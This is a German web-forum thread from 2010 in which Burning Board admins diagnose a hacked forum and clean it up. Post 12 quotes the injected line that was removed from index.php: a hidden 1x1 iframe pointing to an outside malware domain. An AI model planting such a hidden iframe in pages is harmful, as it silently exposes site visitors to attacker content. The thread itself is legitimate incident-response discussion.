Haumis wbb hilfe 
Registrierung Kalender Mitgliederliste Teammitglieder Suche Häufig gestellte Fragen Zur Startseite
Galerie Datenbank Zum Portal

Startseite| Das Board| wbb2| wbblite| Wo finde ich was| Veränderungen| Grafik-Bereich-WBB2| Boardspiele| Vorstellungen| Allgemeines| Trainingscenter|
Haumis wbb hilfe » WBB2 » Fehlermeldungen » Hallo die Experten! » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Hallo die Experten!
Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
sigi47 sigi47 ist männlich
Eroberer


images/avatars/avatar-40.gif
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 65
Herkunft: Österreich / Wien
Postid: 6468
icon18 Hallo die Experten! Beitrag Nr.: 1     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Habe vor einigen Tagen die Meldung bekommen, "sie wurden als unsichere Seite gemeldet", betreibe mein Board (siehe Mitglieder) nun schon einige Jahre, habe eigentlich nichts geändert in letzter Zeit!
Nun komme ich seit Gestern nicht mehr in mein "acp"! Hängt das damit zusammen?
Oder ist das nur ein Zufall?

Weiss jemand von Euch was man da machen kann!
Schon mal ein "danke" im Voraus!

__________________
MfG.- Sigi47
26.12.2010 18:47 sigi47 ist offline E-Mail an sigi47 senden Homepage von sigi47 Beiträge von sigi47 suchenNehmen Sie sigi47 in Ihre Freundesliste auf
haumi haumi ist männlich
Boardbetreiber

images/avatars/avatar-214.jpg
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 3.441
Herkunft: NRW
Postid: 6471
Beitrag Nr.: 2     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hi Sigi,
Nicht ins ACP zu kommen kann eigentlich viele Gründe haben.
Der häufigste ist das Vorhandensein des Securityhacks.
Damit wurden schon einige Admins ausgesperrt.

Um das aber genau rauszubekommen müsste ich doch einige Daten von dir haben.
FTP-Zugang, wenn es am Security liegen sollte und/oder Zugang zur Datenbank um das zu reparieren, wenn es doch eine andere Ursache haben soll.

Zur Not können wir auch mal telefonieren.
Melde dich mal per PN und wenn du möchtest das ich mal anrufen soll,
dann gib mal deine Telefonnummer und eine Zeit an.

LG
haumi

__________________
Gelassen das hinnehmen, was nicht zu ändern ist,
engagiert angehen was man gestalten kann.

26.12.2010 22:32 haumi ist offline E-Mail an haumi senden Homepage von haumi Beiträge von haumi suchenNehmen Sie haumi in Ihre Freundesliste auf
sigi47 sigi47 ist männlich
Eroberer


images/avatars/avatar-40.gif
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 65
Herkunft: Österreich / Wien
Postid: 6476
Themenstarter Thema begonnen von sigi47
Beitrag Nr.: 3     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Guten Morgen - Haumi
Eine PN zu dir ist unterwegs!

Lg. Sigi

__________________
MfG.- Sigi47
27.12.2010 08:30 sigi47 ist offline E-Mail an sigi47 senden Homepage von sigi47 Beiträge von sigi47 suchenNehmen Sie sigi47 in Ihre Freundesliste auf
sigi47 sigi47 ist männlich
Eroberer


images/avatars/avatar-40.gif
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 65
Herkunft: Österreich / Wien
Postid: 6486
Themenstarter Thema begonnen von sigi47
icon3 Beitrag Nr.: 4     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Alles läuft klaglos -
an dieser Stelle nochmals ein kräftiges "Danke schön" an "Haumi"!

__________________
MfG.- Sigi47
27.12.2010 13:13 sigi47 ist offline E-Mail an sigi47 senden Homepage von sigi47 Beiträge von sigi47 suchenNehmen Sie sigi47 in Ihre Freundesliste auf
Ice Ventura Ice Ventura ist männlich
Grünschnabel


images/avatars/avatar-90.png
[meine Galerie]


Dabei seit: 27.12.2010
Beiträge: 8
Herkunft: Bayern
Postid: 6487
Beitrag Nr.: 5     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hab in meinem Forum das gleiche Problem wie Sigi, evtl. könntet ihr hier mal die Fehlerbehebung posten st1

DANKE!
27.12.2010 13:25 Ice Ventura ist offline E-Mail an Ice Ventura senden Homepage von Ice Ventura Beiträge von Ice Ventura suchenNehmen Sie Ice Ventura in Ihre Freundesliste auf
haumi haumi ist männlich
Boardbetreiber

images/avatars/avatar-214.jpg
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 3.441
Herkunft: NRW
Postid: 6488
Beitrag Nr.: 6     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

in der index.php war ganz oben eine Zeile die mit echo anfing.
Da habe ich nur zwei Slashs // davor gemacht.

Ob es bei dir das Gleiche ist weiß ich nicht.

LG
haumi

__________________
Gelassen das hinnehmen, was nicht zu ändern ist,
engagiert angehen was man gestalten kann.

27.12.2010 14:14 haumi ist offline E-Mail an haumi senden Homepage von haumi Beiträge von haumi suchenNehmen Sie haumi in Ihre Freundesliste auf
Ice Ventura Ice Ventura ist männlich
Grünschnabel


images/avatars/avatar-90.png
[meine Galerie]


Dabei seit: 27.12.2010
Beiträge: 8
Herkunft: Bayern
Postid: 6489
Beitrag Nr.: 7     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Dann schau ich mir heute Abend mal die index.php genauer an!

Vielen Dank!

lg
Ice
27.12.2010 14:16 Ice Ventura ist offline E-Mail an Ice Ventura senden Homepage von Ice Ventura Beiträge von Ice Ventura suchenNehmen Sie Ice Ventura in Ihre Freundesliste auf
haumi haumi ist männlich
Boardbetreiber

images/avatars/avatar-214.jpg
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 3.441
Herkunft: NRW
Postid: 6490
Beitrag Nr.: 8     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

sollte es nicht so sein dann musst du dich noch mal melden.

LG
haumi

__________________
Gelassen das hinnehmen, was nicht zu ändern ist,
engagiert angehen was man gestalten kann.

27.12.2010 14:23 haumi ist offline E-Mail an haumi senden Homepage von haumi Beiträge von haumi suchenNehmen Sie haumi in Ihre Freundesliste auf
Ice Ventura Ice Ventura ist männlich
Grünschnabel


images/avatars/avatar-90.png
[meine Galerie]


Dabei seit: 27.12.2010
Beiträge: 8
Herkunft: Bayern
Postid: 6491
Beitrag Nr.: 9     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Super Danke!

lg
Ice
27.12.2010 14:47 Ice Ventura ist offline E-Mail an Ice Ventura senden Homepage von Ice Ventura Beiträge von Ice Ventura suchenNehmen Sie Ice Ventura in Ihre Freundesliste auf
james james ist männlich
Boardbüttel

[meine Galerie]


Dabei seit: 09.06.2009
Beiträge: 139
Herkunft: Aus dem Web.
Postid: 6492
Beitrag Nr.: 10     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Der Echo Code ist da ja bestimmt nicht von alleine reingekommen.
Das wie, wenn es bekannt ist, würde eine bessere Beschreibung geben.
Es deutet ja daraufhin das ein unbefugter da etwas machen konnte.
Sei es nun mit der Tastatur direkt oder mit einem Schad Code der dann aber auch auf dem Server liegen müsste.


james
27.12.2010 16:31 james ist offline E-Mail an james senden Beiträge von james suchenNehmen Sie james in Ihre Freundesliste auf
Ice Ventura Ice Ventura ist männlich
Grünschnabel


images/avatars/avatar-90.png
[meine Galerie]


Dabei seit: 27.12.2010
Beiträge: 8
Herkunft: Bayern
Postid: 6493
Beitrag Nr.: 11     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

ja, es ist komisch, vor allem kapier ich den Zusammenhang nicht, die Fehlermeldung

Warning: Cannot modify header information - headers already sent by (output started at /homepages/39/d202064084/htdocs/wbb2/index.php:2) in /homepages/39/d202064084/htdocs/wbb2/acp/lib/functions.php on line 82


und dass mein ACP komplett weiss ist, sowas hab ich noch nie erlebt! st4
27.12.2010 16:51 Ice Ventura ist offline E-Mail an Ice Ventura senden Homepage von Ice Ventura Beiträge von Ice Ventura suchenNehmen Sie Ice Ventura in Ihre Freundesliste auf
haumi haumi ist männlich
Boardbetreiber

images/avatars/avatar-214.jpg
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 3.441
Herkunft: NRW
Postid: 6494
Beitrag Nr.: 12     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Ich bin nun wieder am PC und habe die index.php nochmal geöffnet um die Zeile mal hier einzustellen.
(Sie war in der wbb2/index.php und wbb2/acp/index.php drin)
Ich würde Sigi raten die Passwörter schnellstmöglich zu ändern.

Hier ist die Zeile welche sich direkt unter <?php befand und jetzt von mir gelöscht wurde.

code:
1:
echo "<iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"></iframe>";


Solle es sich erweisen, das bei Ice Ventura ebenfalls diese Zeile drin ist dann auch hier schnellstens die Passwörter ändern.

LG
haumi

__________________
Gelassen das hinnehmen, was nicht zu ändern ist,
engagiert angehen was man gestalten kann.

27.12.2010 16:54 haumi ist offline E-Mail an haumi senden Homepage von haumi Beiträge von haumi suchenNehmen Sie haumi in Ihre Freundesliste auf
ersatzspieler
unregistriert


Beitrag Nr.: 13     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

hab mal googlet solltet ihr mal auch nach disreco.com was da alles so steht st13

LG Blackjubel
27.12.2010 17:09
sigi47 sigi47 ist männlich
Eroberer


images/avatars/avatar-40.gif
[meine Galerie]


Dabei seit: 06.06.2009
Beiträge: 65
Herkunft: Österreich / Wien
Postid: 6496
Themenstarter Thema begonnen von sigi47
icon13 Beitrag Nr.: 14     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Hi Blackjubel
Wenn mich nicht alles täuscht, ist dieses "disreco" unten link bei mir kurz aufgeschienen und dann hatte ich den weissen Bildschirm und unten darüber dann "fertig"!

__________________
MfG.- Sigi47
27.12.2010 17:23 sigi47 ist offline E-Mail an sigi47 senden Homepage von sigi47 Beiträge von sigi47 suchenNehmen Sie sigi47 in Ihre Freundesliste auf
ersatzspieler
unregistriert


Beitrag Nr.: 15     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

na die seite oder weiß ich auch immer steht doch im iframe den haumi gefunden hat in der index.php wen ich das hier alles richtig verstanden habe und habe mal nach googelt und da steht viel drüber und ist erst das meiste seit ein paar tagen .

LG
27.12.2010 17:29
Ice Ventura Ice Ventura ist männlich
Grünschnabel


images/avatars/avatar-90.png
[meine Galerie]


Dabei seit: 27.12.2010
Beiträge: 8
Herkunft: Bayern
Postid: 6499
Beitrag Nr.: 16     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Es hat geklappt! Vielen vielen Dank!

Hab auch gleich alle Kennwörter (ACP + Ftp) geändert st12
27.12.2010 18:26 Ice Ventura ist offline E-Mail an Ice Ventura senden Homepage von Ice Ventura Beiträge von Ice Ventura suchenNehmen Sie Ice Ventura in Ihre Freundesliste auf
james james ist männlich
Boardbüttel

[meine Galerie]


Dabei seit: 09.06.2009
Beiträge: 139
Herkunft: Aus dem Web.
Postid: 6500
Beitrag Nr.: 17     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Die Admin-Passwörter erneuern.
Auch neue Passworte erteilen für ALLE die Zugriff auf das ACP und den Server haben, FTP und Confix.


Jetzt muss nur noch danach gesucht werden wie diese Zeilen zustande gekommen sind.
Durch Zauber oder von alleine kommt so was nicht.
27.12.2010 22:56 james ist offline E-Mail an james senden Beiträge von james suchenNehmen Sie james in Ihre Freundesliste auf
Listiger_Falke Listiger_Falke ist männlich
Administrator


images/avatars/avatar-178.gif
[meine Galerie]


Dabei seit: 16.03.2010
Beiträge: 786
Herkunft: Bremerhaven
Postid: 6501
Beitrag Nr.: 18     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Also folgendes

Ich hatte mal ein ähnliches Problem, der Script ist bei mir NICHT direkt auf den Server gelangt, sondern über dem Umweg vorher meinen PC, den ich zur Serververwaltung nutze, auszuspähen.

Soweit ich das beurteilen kann (recherche über Google bei anderen die diesen Script haben) scheint mir dieser auf die gleiche Weise vorgegangen zu sein.

Bei mir hatte sich ein Trojaner ins Betriebssystem gesetzt, durch einfaches anklicken einer Website. Dieser Trojaner wurde nicht von meinem Virenscanner erkannt/erfasst. Dieser Trojaner hat danach alle Passwörter ausgespäht und ins Internet gesand. Dadurch war es auch nutzlos die Passwörter zu ändern, denn die neuen wurden ja sofort wieder versand.

D.h. nach Säuberung meiner PHP-Dateien des Forums waren diese nach wenigen Tagen wieder verseucht. Mein Script befiel damals alle index.Dateiendung htm/html/php Dateien, auch die in Spielen (was bei einigen Tausend Spielen lustig ist). Ich habe dann den Script an meinen Virenscanneranbieter eingesand, der diesen dann auch als Trojaner klassifizierte, und dann ein Backup bereit stellte, der den Trojaner erkannte. (Allerdings nur in den Onlinedateien, nicht den Ursprung auf meinem PC)

Den Trojaner auf meinem PC konnte ich im folgenden durch eine Anleitung entfernen, die ich danach im I-Net fand. Allerdings dauert es immer einige Tage bis jemand den wirklichen Übeltäter findet und eine Hilfe bereit stellt.

Ich kann also nur empfehlen in der nächsten Zeit immer wieder zu schauen ob dieser oder ähnliche Scripte in der Index auftauchen, falls dieses der Fall ist sitzt das Problem wohl tiefer als in einem Angriff auf den Server. Es empfielt sich auch weiter in Google zu prüfen ob neue Ergebnisse zu dem Script vorliegen (Bezüglich Ursprungsprogramm, welches eventuell den PC befallen hat und weiter ausspäht - Des weiteren empfehle ich eine wirklich vernünftige Virensoftware zu installieren, viele haben Trojaner o.ä. auf der Festplatte, ohne es zu wissen)

__________________
Bis auf weiteres nur eingeschränkter Support

28.12.2010 01:36 Listiger_Falke ist offline E-Mail an Listiger_Falke senden Homepage von Listiger_Falke Beiträge von Listiger_Falke suchenNehmen Sie Listiger_Falke in Ihre Freundesliste auf
Flughund Flughund ist männlich


images/avatars/avatar-128.jpg
[meine Galerie]


Dabei seit: 13.06.2009
Beiträge: 269
Herkunft: Erlangen
Postid: 6503
Beitrag Nr.: 19     Auf diesen Beitrag antworten Zitatantwort auf diesen Beitrag erstellen Diesen Beitrag editieren/löschen Diesen Beitrag einem Moderator melden       Zum Anfang der Seite springen

Guten Morgen zusammen


nun wer gern Wissen möchte was sonst noch so auf seinen PC

sich versteckt hat. Der sollte vielleicht man den Hijack versuchen


Die Bedienung und Anleitung gibt es hier

http://www.hijackthis.de/


Liebe Grüße
Flughund st1 st1 st1

__________________

28.12.2010 06:54 Flughund ist offline E-Mail an Flughund senden Homepage von Flughund Beiträge von Flughund suchenNehmen Sie Flughund in Ihre Freundesliste auf Fügen Sie Flughund in Ihre Kontaktliste ein AIM-Name von Flughund: omatyr111 YIM-Name von Flughund: Flughund_Bernd MSN Passport-Profil von Flughund anzeigen
Baumstruktur | Brettstruktur
Gehe zu:
Neues Thema erstellen Antwort erstellen
Haumis wbb hilfe » WBB2 » Fehlermeldungen » Hallo die Experten!

Views heute: 16.734 | Views gestern: 33.086 | Views gesamt: 71.544.761
Powered by Burning Board 2.3.6 © 2001-2004 WoltLab GmbH
Am Netz seit dem 3.6.2009 - Powered by © haumis-Team
Style & Buttons © by FriendsbistroTeam
Boardregeln Impressum & Haftungsauschluss Datenschutzerklärung